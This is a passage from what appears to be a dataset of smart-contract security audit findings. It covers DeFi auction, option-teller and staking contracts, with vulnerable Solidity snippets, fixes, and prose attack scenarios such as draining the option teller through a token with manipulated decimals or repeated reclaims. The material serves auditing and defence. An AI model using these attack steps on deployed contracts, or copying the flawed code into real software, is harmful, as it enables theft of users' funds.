unexpected behaviors under these circumstances selling the tokens at the wrong price. Since both functions are written in assembly it is very difficult to determine exactly what is going on or why this occurs but testing in remix gives the following values:\\n```\\nexpWad(1e6) - WAD = 1e6\\nexpWad(5e6) - WAD = 5e6\\nexpWad(10e6) - WAD = 10e6\\nexpWad(1000e6) - WAD = 1000e6\\n```\\n\\nAs seen above these value create a perfect linear scaling and don't exhibit any exponential qualities. Given the range of this linearity it means that these adapters can never work when selling from higher to lower dp tokens.чscalingFactor should be scaled to 18 dp then applied via preciseMul instead of simple multiplication. This allows lnWad and expWad to execute in 18 dp then be scaled down to the correct dp.чExponential and logarithmic pricing is wrong when tokens have mismatched dpч```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n -SetToken can't be unlocked early.чmediumчSetToken can't be unlocked early\\nThe function unlock() is used to unlock the setToken after rebalancing, as how it is right now there are two ways to unlock the setToken.\\ncan be unlocked once the rebalance duration has elapsed\\ncan be unlocked early if all targets are met, there is excess or at-target quote asset, and raiseTargetPercentage is zero\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, \"Cannot unlock early unless all targets are met and raiseTargetPercentage is zero\");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n\\n```\\n function _canUnlockEarly(ISetToken _setToken) internal view returns (bool) {\\n RebalanceInfo storage rebalance = rebalanceInfo[_setToken];\\n return _allTargetsMet(_setToken) && _isQuoteAssetExcessOrAtTarget(_setToken) && rebalance.raiseTargetPercentage == 0;\\n }\\n```\\n\\nThe main problem occurs as the value of raiseTargetPercentage isn't reset after rebalancing. The other thing is that the function setRaiseTargetPercentage can't be used to fix this issue as it doesn't allow giving raiseTargetPercentage a zero value.\\nA setToken can use the AuctionModule to rebalance multiple times, duo to the fact that raiseTargetPercentage value isn't reset after every rebalancing. Once changed with the help of the function setRaiseTargetPercentage this value will only be non zero for every next rebalancing. A setToken can be unlocked early only if all other requirements are met and the raiseTargetPercentage equals zero.\\nThis problem prevents for a setToken to be unlocked early on the next rebalances, once the value of the variable raiseTargetPercentage is set to non zero.\\nOn every rebalance a manager should be able to keep the value of raiseTargetPercentage to zero (so the setToken can be unlocked early), or increase it at any time with the function setRaiseTargetPercentage.\\n```\\n function setRaiseTargetPercentage(\\n ISetToken _setToken,\\n uint256 _raiseTargetPercentage\\n )\\n external\\n onlyManagerAndValidSet(_setToken)\\n {\\n // Ensure the raise target percentage is greater than 0\\n require(_raiseTargetPercentage > 0, \"Target percentage must be greater than 0\");\\n\\n // Update the raise target percentage in the RebalanceInfo struct\\n rebalanceInfo[_setToken].raiseTargetPercentage = _raiseTargetPercentage;\\n\\n // Emit an event to log the updated raise target percentage\\n emit RaiseTargetPercentageUpdated(_setToken, _raiseTargetPercentage);\\n }\\n```\\nчRecommend to reset the value raiseTargetPercentage after every rebalancing.\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, \"Cannot unlock early unless all targets are met and raiseTargetPercentage is zero\");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n+ rebalanceInfo[_setToken].raiseTargetPercentage = 0;\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\nчOnce the value of raiseTargetPercentage is set to non zero, every next rebalancing of the setToken won't be eligible for unlocking early. As the value of raiseTargetPercentage isn't reset after every rebalance and neither the manager can set it back to zero with the function setRaiseTargetPercentage().ч```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, \"Cannot unlock early unless all targets are met and raiseTargetPercentage is zero\");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n -price is calculated wrongly in BoundedStepwiseExponentialPriceAdapterчmediumчThe BoundedStepwiseExponentialPriceAdapter contract is trying to implement price change as `scalingFactor * (e^x - 1)` but the code implements `scalingFactor * e^x - 1`. Since there are no brackets, multiplication would be executed before subtraction. And this has been confirmed with one of the team members.\\nThe getPrice code has been simplified as the following when boundary/edge cases are ignored\\n```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n\\nWhen timeBucket is 0, we want priceChange to be 0, so that the returned price would be the initial price. Since `e^0 = 1`, we need to subtract 1 (in WAD) from the `expExpression`.\\nHowever, with the incorrect implementation, the returned price would be different than real price by a value equal to `scalingFactor - 1`. The image below shows the difference between the right and wrong formula when initialPrice is 100 and scalingFactor is 11. The right formula starts at 100 while the wrong one starts at 110=100+11-1\\nчChange the following line\\n```\\n- uint256 priceChange = scalingFactor * expExpression - WAD;\\n+ uint256 priceChange = scalingFactor * (expExpression - WAD);\\n```\\nчIncorrect price is returned from BoundedStepwiseExponentialPriceAdapter and that will have devastating effects on rebalance.ч```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n -Full inventory asset purchases can be DOS'd via frontrunningчmediumчUsers who attempt to swap the entire component value can be frontrun with a very small bid making their transaction revert\\nAuctionRebalanceModuleV1.sol#L795-L796\\n```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, \"Bid size exceeds auction quantity\");\\n```\\n\\nWhen creating a bid, it enforces the above requirement. This prevents users from buying more than they should but it is also a source of an easy DOS attack. Assume a user is trying to buy the entire balance of a component, a malicious user can frontrun them buying only a tiny amount. Since they requested the entire balance, the call with fail. This is a useful technique if an attacker wants to DOS other buyers to pass the time and get a better price from the dutch auction.чAllow users to specify type(uint256.max) to swap the entire available balanceчMalicious user can DOS legitimate users attempting to purchase the entire amount of componentч```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, \"Bid size exceeds auction quantity\");\\n```\\n -All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedlyчhighчAll fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly\\nWhen mint an option token, the user is required to transfer the payout token for a call option or quote token for a put option\\nif after the expiration, the receiver can call reclaim to claim the payout token if the option type is call or claim the quote token if the option type is put\\nhowever, the root cause is when reclaim the token, the corresponding option is not burnt (code)\\n```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n\\nthe Teller contract is likely to hold fund from multiple option token\\na malicious actor can create call Teller#deploy and set a receiver address that can control by himself\\nand then wait for the option expiry and repeated call reclaim to steal the fund from the Teller contractчBurn the corresponding option burn when reclaim the fundчAll fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedlyч```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n -All funds can be stolen from FixedStrikeOptionTeller using a token with malicious decimalsчhighч`FixedStrikeOptionTeller` is a single contract which deploys multiple option tokens. Hence this single contract holds significant payout/quote tokens as collateral. Also the `deploy`, `create` & `exercise` functions of this contract can be called by anyone.\\nThis mechanism can be exploited to drain `FixedStrikeOptionTeller` of all tokens.\\nThis is how the create functions looks like:\\n```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n\\nexercise function:\\n```\\n function exercise(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n if (msg.sender != receiver) {\\n // rest of code\\n }\\n\\n optionToken.burn(msg.sender, amount_);\\n\\n if (call) {\\n // rest of code\\n } else {\\n quoteToken.safeTransfer(msg.sender, quoteAmount);\\n }\\n }\\n```\\n\\nConsider this attack scenario:\\nLet's suppose the `FixedStrikeOptionTeller` holds some DAI tokens.\\nAn attacker can create a malicious payout token of which he can control the `decimals`.\\nThe attacker calls `deploy` to create an option token with malicious payout token and DAI as quote token and `put` option type\\nMake `payoutToken.decimals` return a large number and call `FixedStrikeOptionTeller.create` with input X. Here `quoteAmount` will be calculated as `0`.\\n```\\n// Calculate amount of quote tokens required to mint\\nuint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n// Transfer quote tokens from user\\n// Check that amount received is not less than amount expected\\n// Handles edge cases like fee-on-transfer tokens (which are not supported)\\nuint256 startBalance = quoteToken.balanceOf(address(this));\\nquoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n```\\n\\nSo 0 DAI will be pulled from the attacker's account but he will receive X option token.\\nMake `payoutToken.decimals` return a small value and call `FixedStrikeOptionTeller.exercise` with X input. Here `quoteAmount` will be calculated as a very high number (which represents number of DAI tokens). So he will receive huge amount of DAI against his X option tokens when exercise the option or when reclaim the token\\n```\\n// Transfer remaining collateral to receiver\\nuint256 amount = optionToken.totalSupply();\\nif (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n} else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n}\\n```\\n\\nHence, the attacker was able to drain all DAI tokens from the `FixedStrikeOptionTeller` contract. The same mechanism can be repeated to drain all other ERC20 tokens from the `FixedStrikeOptionTeller` contract by changing the return value of the decimal external callчConsider storing the `payoutToken.decimals` value locally instead of fetching it real-time on all `exercise` or `reclaim` calls.\\nor support payout token and quote token whitelist, if the payout token and quote token are permissionless created, there will always be high riskчAnyone can drain `FixedStrikeOptionTeller` contract of all ERC20 tokens. The cost of attack is negligible (only gas cost).\\nHigh impact, high likelyhood.ч```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n -Blocklisted address can be used to lock the option token minter's fundчmediumчBlocklisted address can be used to lock the option token minter's fund\\nWhen deploy a token via the teller contract, the contract validate that receiver address is not address(0)\\nHowever, a malicious option token creator can save a seemingly favorable strike price and pick a blocklisted address and set the blocklisted address as receiver\\nSome tokens (e.g. USDC, USDT) have a contract level admin controlled address blocklist. If an address is blocked, then transfers to and from that address are forbidden.\\nMalicious or compromised token owners can trap funds in a contract by adding the contract address to the blocklist. This could potentially be the result of regulatory action against the contract itself, against a single user of the contract (e.g. a Uniswap LP), or could also be a part of an extortion attempt against users of the blocked contract.\\nthen user would see the favorable strike price and mint the option token using payout token for call option or use quote token for put option\\nHowever, they can never exercise their option because the transaction would revert when transferring asset to the recevier for call option and transferring asset to the receiver for put option when exercise the option.\\n```\\n\\n```\\n\\nthe usre's fund that used to mint the option are lockedчValid that receiver is not blacklisted when create and deploy the option token or add an expiry check, if after the expiry the receiver does not reclaim the fund, allows the option minter to burn their token in exchange for their fundчBlocklisted receiver address can be used to lock the option token minter's fundч```\\n\\n```\\n -Loss of option token from Teller and reward from OTLM if L2 sequencer goes downчmediumчLoss of option token from Teller and reward from OTLM if L2 sequencer goes down\\nIn the current implementation, if the option token expires, the user is not able to exerise the option at strike price\\n```\\n // Validate that option token is not expired\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nif the option token expires, the user lose rewards from OTLM as well when claim the reward\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n```\\n\\nand\\n```\\n // If the option token has expired, then the rewards are zero\\n if (uint256(optionToken.expiry()) < block.timestamp) return 0;\\n```\\n\\nAnd in the onchain context, the protocol intends to deploy the contract in arbitrum and optimsim\\n```\\nQ: On what chains are the smart contracts going to be deployed?\\nMainnet, Arbitrum, Optimism\\n```\\n\\nHowever, If Arbitrum and optimism layer 2 network, the sequencer is in charge of process the transaction\\nFor example, the recent optimism bedrock upgrade cause the sequencer not able to process transaction for a hew hours\\nBedrock Upgrade According to the official announcement, the upgrade will require 2-4 hours of downtime for OP Mainnet, during which there will be downtime at the chain and infrastructure level while the old sequencer is spun down and the Bedrock sequencer starts up.\\nTransactions, deposits, and withdrawals will also remain unavailable for the duration, and the chain will not be progressing. While the read access across most OP Mainnet nodes will stay online, users may encounter a slight decrease in performance during the migration process.\\nIn Arbitrum\\nArbitrum Goes Down Citing Sequencer Problems Layer 2 Arbitrum suffers 10 hour outage.\\nand\\nEthereum layer-2 (L2) scaling solution Arbitrum stopped processing transactions on June 7 because its sequencer faced a bug in the batch poster. The incident only lasted for an hour.\\nIf the option expires during the sequencer down time, the user basically have worthless option token because they cannot exercise the option at strike price\\nthe user would lose his reward as option token from OTLM.sol, which defeats the purpose of use OTLM to incentive user to provide liquidityчchainlink has a sequencer up feed\\nconsider integrate the up time feed and give user extra time to exercise token and claim option token reward if the sequencer goes downчLoss of option token from Teller and reward from OTLM if L2 sequencer goes downч```\\n // Validate that option token is not expired\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n -Use A's staked token balance can be used to mint option token as reward for User B if the payout token equals to the stake tokenчmediumчUser's staked token balance can be used to mint option token as reward if the payout token equals to the stake token, can cause user to loss fund\\nIn OTLM, user can stake stakeToken in exchange for the option token minted from the payment token\\nwhen staking, we transfer the stakedToken in the OTLM token\\n```\\n// Increase the user's stake balance and the total balance\\nstakeBalance[msg.sender] = userBalance + amount_;\\ntotalBalance += amount_;\\n\\n// Transfer the staked tokens from the user to this contract\\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n```\\n\\nbefore the stake or unstake or when we are calling claimReward\\nwe are calling _claimRewards -> _claimEpochRewards -> we use payout token to mint and create option token as reward\\n```\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n\\n // Transfer rewards to sender\\n ERC20(address(optionToken)).safeTransfer(msg.sender, rewards);\\n```\\n\\nthe problem is, if the stake token and the payout token are the same token, the protocol does not distingush the balance of the stake token and the balance of payout token\\nsuppose both stake token and payout token are USDC\\nsuppose user A stake 100 USDC\\nsuppose user B stake 100 USDC\\ntime passed, user B accure 10 token unit reward\\nnow user B can claimRewards,\\nthe protocol user 10 USDC to mint option token for B\\nthe OTLM has 190 USDC\\nif user A and user B both call emergencyUnstakeAll, whoeve call this function later will suffer a revert and he is not able to even give up the reward and claim their staked balance back\\nbecause a part of the his staked token balance is treated as the payout token to mint option token reward for other userчSeperate the accounting of the staked user and the payout token or check that staked token is not payout token when creating the OTLM.solчIf there are insufficient payout token in the OTLM, the expected behavior is that the transaction revert when claim the reward and when the code use payout token to mint option token\\nand in the worst case, user can call emergencyUnstakeAll to get their original staked balane back and give up their reward\\nhowever, if the staked token is the same as the payout token,\\na part of the user staked token can be mistakenly and constantly mint as option token reward for his own or for other user and eventually when user call emergencyUnstakeAll, there will be insufficient token balance and transaction revert\\nso user will not able to get their staked token backч```\\n// Increase the user's stake balance and the total balance\\nstakeBalance[msg.sender] = userBalance + amount_;\\ntotalBalance += amount_;\\n\\n// Transfer the staked tokens from the user to this contract\\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n```\\n -IERC20(token).approve revert if the underlying ERC20 token approve does not return booleanчmediumчIERC20(token).approve revert if the underlying ERC20 token approve does not return boolean\\nWhen transferring the token, the protocol use safeTransfer and safeTransferFrom\\nbut when approving the payout token, the safeApprove is not used\\nfor non-standard token such as USDT,\\ncalling approve will revert because the solmate ERC20 enforce the underlying token return a boolean\\n```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n\\nwhile the token such as USDT does not return booleanчUse safeApprove instead of approveчUSDT or other ERC20 token that does not return boolean for approve is not supported as the payout tokenч```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n -Division before multiplication result in loss of token reward if the reward update time elapse is smallчmediumчDivision before multiplication result in loss of token reward\\nWhen calcuting the reward, we are calling\\n```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n\\nthe precision loss can be high because the accumulated reward depends on the time elapse:\\n(block.timestamp - lastRewardUpdate)\\nand the REWARD_PERIOD is hardcoded to one days:\\n```\\n /// @notice Amount of time (in seconds) that the reward rate is distributed over\\n uint48 public constant REWARD_PERIOD = uint48(1 days);\\n```\\n\\nif the time elapse is short and the currentRewardsPerToken is updated frequently, the precision loss can be heavy and even rounded to zero\\nthe lower the token precision, the heavier the precision loss\\nSome tokens have low decimals (e.g. USDC has 6). Even more extreme, some tokens like Gemini USD only have 2 decimals.\\nconsider as extreme case, if the reward token is Gemini USD, the reward rate is set to 1000 * 10 = 10 ** 4 = 10000\\nif the update reward keep getting called within 8 seconds\\n8 * 10000 / 86400 is already rounded down to zero and no reward is accuring for userчAvoid division before multiplcation and only perform division at lastчDivision before multiplication result in loss of token reward if the reward update time elapse is smallч```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n -FixedStrikeOptionTeller: create can be invoked when block.timestamp == expiry but exercise revertsчmediumчIn `FixedStrikeOptionTeller` contract, new option tokens can be minted when `block.timestamp == expiry` but these option tokens cannot be exercised even in the same transaction.\\nThe `create` function has this statement:\\n```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n\\nThe `exercise` function has this statement:\\n```\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nNotice the `>=` operator which means when `block.timestamp == expiry` the `exercise` function reverts.\\nThe `FixedStrikeOptionTeller.create` function is invoked whenever a user claims his staking rewards using `OTLM.claimRewards` or `OTLM.claimNextEpochRewards`. (here)\\nSo if a user claims his rewards when `block.timestamp == expiry` he receives the freshly minted option tokens but he cannot exercise these option tokens even in the same transaction (or same block).\\nMoreover, since the receiver do not possess these freshly minted option tokens, he cannot `reclaim` them either (assuming `reclaim` function contains the currently missing `optionToken.burn` statement).чConsider maintaining a consistent timestamp behaviour. Either prevent creation of option tokens at expiry or allow them to be exercised at expiry.чOption token will be minted to user but he cannot exercise them. Receiver cannot reclaim them as he doesn't hold that token amount.\\nThis leads to loss of funds as the minted option tokens become useless. Also the scenario of users claiming at expiry is not rare.ч```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n -stake() missing set lastEpochClaimed when userBalance equal 0чmediumчbecause `stake()` don't set `lastEpochClaimed[user] = last epoch` if `userBalance` equal 0 So all new stake user must loop from 0 to `last epoch` for `_claimRewards()` As the epoch gets bigger and bigger it will waste a lot of GAS, which may eventually lead to `GAS_OUT`\\nin `stake()`, when the first-time `stake()` only `rewardsPerTokenClaimed[msg.sender]` but don't set `lastEpochClaimed[msg.sender]`\\n```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n\\nso every new staker , needs claims from 0\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n\\n // If the last epoch claimed is equal to the current epoch, then only try to claim for the current epoch\\n if (userLastEpoch == epoch) return _claimEpochRewards(epoch);\\n\\n // If not, then the user has not claimed all rewards\\n // Start at the last claimed epoch because they may not have completely claimed that epoch\\n uint256 totalRewardsClaimed;\\n for (uint48 i = userLastEpoch; i <= epoch; i++) {\\n // For each epoch that the user has not claimed rewards for, claim the rewards\\n totalRewardsClaimed += _claimEpochRewards(i);\\n }\\n\\n return totalRewardsClaimed;\\n }\\n```\\n\\nWith each new addition of `epoch`, the new stake must consumes a lot of useless loops, from loop 0 to last `epoch` When `epoch` reaches a large size, it will result in GAS_OUT and the method cannot be executedч```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n+ lastEpochClaimed[msg.sender] = epoch;\\n }\\n```\\nчWhen the `epoch` gradually increases, the new take will waste a lot of GAS When it is very large, it will cause GAS_OUTч```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n -claimRewards() If a rewards is too small, it may block other epochsчmediumчWhen `claimRewards()`, if some `rewards` is too small after being round down to 0 If `payoutToken` does not support transferring 0, it will block the subsequent epochs\\nThe current formula for calculating rewards per cycle is as follows.\\n```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n\\nCalculate `rewards` formula : uint256 `rewards` = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /10 ** stakedTokenDecimals;\\nWhen `rewardsPerTokenEnd` is very close to `userRewardsClaimed`, `rewards` is likely to be round downs to 0 Some tokens do not support transfer(amount=0) This will revert and lead to can't claimsч```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code..\\n\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n+ if (rewards == 0 ) return 0;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\nчStuck `claimRewards()` when the rewards of an epoch is 0ч```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n -Lack of segregation between users' assets and collected fees resulting in loss of funds for the usersчhighчThe users' assets are wrongly sent to the owner due to a lack of segregation between users' assets and collected fees, which might result in an irreversible loss of assets for the victims.\\nGLX uses the Chainlink Automation to execute the `LimitOrderRegistry.performUpkeep` function when there are orders that need to be fulfilled. The `LimitOrderRegistry` contract must be funded with LINK tokens to keep the operation running.\\nTo ensure the LINK tokens are continuously replenished and funded, users must pay a fee denominated in Native ETH or ERC20 WETH tokens on orders claiming as shown below. The collected ETH fee will be stored within the `LimitOrderRegistry` contract.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\nTo retrieve the ETH fee collected, the owner will call the `LimitOrderRegistry.withdrawNative` function that will send all the Native ETH and ERC20 WETH tokens within the `LimitOrderRegistry` contract to the owner's address. After executing this function, the Native ETH and ERC20 WETH tokens on this contract will be zero and wiped out.\\n```\\nFile: LimitOrderRegistry.sol\\n function withdrawNative() external onlyOwner {\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure 